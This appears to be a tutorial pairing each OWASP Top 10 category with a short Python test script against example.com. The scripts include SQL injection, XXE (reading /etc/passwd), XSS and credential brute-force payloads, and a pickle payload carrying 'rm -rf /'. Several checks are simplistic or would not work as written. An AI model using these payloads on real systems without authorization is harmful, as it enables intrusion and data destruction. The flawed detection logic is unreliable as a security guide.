Top 10 OWASP Vulnerabilities and Python Scripts to Test Them

1. Injection: Injection vulnerabilities occur when untrusted data is sent to an interpreter as part of a command or query. To test for injection vulnerabilities using Python, you can use the requests library to send payloads and analyze the responses. Here's an example script to test for SQL injection:

import requests

url = "http://example.com/vulnerable_page.php"
payload = "' OR 1=1--"
params = {"id": payload}

response = requests.get(url, params=params)
if "error" in response.text.lower():
    print("Potential SQL injection vulnerability detected!")
else:
    print("No SQL injection vulnerability found.")

2. Broken Authentication: Broken authentication vulnerabilities allow attackers to compromise passwords, keys, or session tokens. To test for broken authentication using Python, you can attempt to bypass login pages or brute-force credentials. Here's an example script to test for weak passwords:

import requests

url = "http://example.com/login.php"
usernames = ["admin", "user", "test"]
passwords = ["password", "123456", "qwerty"]

for username in usernames:
    for password in passwords:
        data = {"username": username, "password": password}
        response = requests.post(url, data=data)
        if "welcome" in response.text.lower():
            print(f"Weak credentials found: {username}:{password}")

3. Sensitive Data Exposure: Sensitive data exposure vulnerabilities occur when sensitive information is not properly protected. To test for sensitive data exposure using Python, you can analyze responses for leakage of sensitive information. Here's an example script to check for credit card numbers in responses:

import requests
import re

url = "http://example.com/user_profile.php"
response = requests.get(url)

pattern = r"\b(?:\d{4}[-\s]?){3}\d{4}\b"
matches = re.findall(pattern, response.text)

if matches:
    print("Potential credit card numbers found:")
    for match in matches:
        print(match)
else:
    print("No credit card numbers found.")

4. XML External Entities (XXE): XXE vulnerabilities occur when an application parses untrusted XML input without proper validation. To test for XXE using Python, you can send malicious XML payloads and observe the responses. Here's an example script to test for XXE:

import requests

url = "http://example.com/parse_xml.php"
payload = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'
headers = {"Content-Type": "application/xml"}

response = requests.post(url, data=payload, headers=headers)
if "root:x" in response.text:
    print("XXE vulnerability detected!")
else:
    print("No XXE vulnerability found.")

5. Broken Access Control: Broken access control vulnerabilities allow attackers to access unauthorized resources or perform unauthorized actions. To test for broken access control using Python, you can attempt to access restricted pages or modify parameters. Here's an example script to test for insecure direct object references (IDOR):

import requests

url = "http://example.com/user_profile.php"
user_id = "1234"
attacker_id = "5678"

response = requests.get(url + "?id=" + attacker_id)
if "welcome" in response.text.lower():
    print("IDOR vulnerability detected!")
else:
    print("No IDOR vulnerability found.")

6. Security Misconfiguration: Security misconfiguration vulnerabilities occur when security settings are not properly configured. To test for security misconfigurations using Python, you can check for default credentials, exposed debugging information, or misconfigured HTTP headers. Here's an example script to check for exposed debugging information:

import requests

url = "http://example.com/debug.php"
response = requests.get(url)

if "debug" in response.text.lower():
    print("Exposed debugging information found!")
else:
    print("No exposed debugging information found.")

7. Cross-Site Scripting (XSS): XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. To test for XSS using Python, you can send payloads and analyze the responses for script execution. Here's an example script to test for reflected XSS:

import requests

url = "http://example.com/search.php"
payload = '<script>alert("XSS")</script>'
params = {"q": payload}

response = requests.get(url, params=params)
if payload in response.text:
    print("Reflected XSS vulnerability detected!")
else:
    print("No reflected XSS vulnerability found.")

8. Insecure Deserialization: Insecure deserialization vulnerabilities occur when untrusted data is deserialized by an application. To test for insecure deserialization using Python, you can send malicious serialized objects and observe the application's behavior. Here's an example script to test for insecure deserialization using the pickle module:

import requests
import pickle

url = "http://example.com/deserialize.php"
payload = pickle.dumps({"cmd": "rm -rf /"})
headers = {"Content-Type": "application/x-python-serialize"}

response = requests.post(url, data=payload, headers=headers)
if "success" in response.text.lower():
    print("Insecure deserialization vulnerability detected!")
else:
    print("No insecure deserialization vulnerability found.")

9. Using Components with Known Vulnerabilities: Using components with known vulnerabilities can expose an application to attacks. To test for known vulnerabilities using Python, you can use tools like safety to check the dependencies of your project. Here's an example command to check for known vulnerabilities:

safety check -r requirements.txt

10. Insufficient Logging & Monitoring: Insufficient logging and monitoring can make it difficult to detect and respond to attacks. To test for insufficient logging and monitoring using Python, you can analyze the application's logs and check for missing or inadequate logging. Here's an example script to check for the presence of log files:

import os

log_directory = "/var/log/myapp"
if os.path.exists(log_directory):
    print("Log directory exists.")
    log_files = os.listdir(log_directory)
    if log_files:
        print("Log files found:")
        for log_file in log_files:
            print(log_file)
    else:
        print("No log files found.")
else:
    print("Log directory does not exist.")

These are just a few examples of how you can use Python to test for the OWASP Top 10 vulnerabilities. Remember to always obtain proper authorization before testing any application and to conduct tests in a responsible and ethical manner.